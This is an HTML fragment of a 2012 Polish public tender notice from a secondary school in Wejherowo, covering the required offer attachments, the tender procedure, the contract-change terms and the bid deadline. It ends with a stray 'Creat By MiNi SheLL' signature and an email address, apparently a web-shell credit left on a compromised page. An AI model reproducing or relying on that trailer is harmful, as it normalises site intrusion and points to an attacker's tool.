<p>Nr 1	Oferta (wzór) ;
Nr 2	Oświadczenie  o spełnieniu warunków z art.22 ustawy p.z.p.(wzór)
Nr 4     Zgoda innych podmiotów na korzystanie z niezbędnych zasobów innych podmiotów.
Nr 5     Ustanowienie pełnomocnika;
Nr 6	Wykaz osób upoważnionych do występowania w imieniu wykonawcy.
Do oferty należy załączyć:
      a) kosztorys uproszczony z zestawieniem elementów cenotwórczych: Kp, Kz,Z,
     stawka r-b. 
      b) oświadczenie o dokonaniu wizji lokalnej ( załącznik nr 9 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy za zgodą obu 
         stron w zakresie zmiany terminu wykonania umowy w następujących przypadkach:
        - w związku z koniecznością  wykonania robót dodatkowych, nieobjętych zamówieniem  
          podstawowym niezbędnych do jego prawidłowego wykonania, których wykonanie stało 
          się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: 
                a)  z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego 
                od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich 
                kosztów lub
                b)  wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
                dodatkowego;
    - na pisemny wniosek wykonawcy, o ile zachodzą szczególne przesłanki niezależne od   
    Wykonawcy,  w szczególności w sytuacji wystąpienia okoliczności, których nie można  było przewidzieć w chwili zawarcia umowy. Ocena zaistnienia powyższych przesłanek uprawniających do przedłużenia terminu wykonania robót leży w gestii Kierownika Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspg4.wejher.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych Nr 4  im. J. Wejhera w Wejherowie, ul. Sobieskiego 344
84-200 Wejherowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 10:15, miejsce: Zespół Szkół Ponadgimnazjalnych Nr 4  im. J. Wejhera w Wejherowie, ul. Sobieskiego 344
84-200 Wejherowo- sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com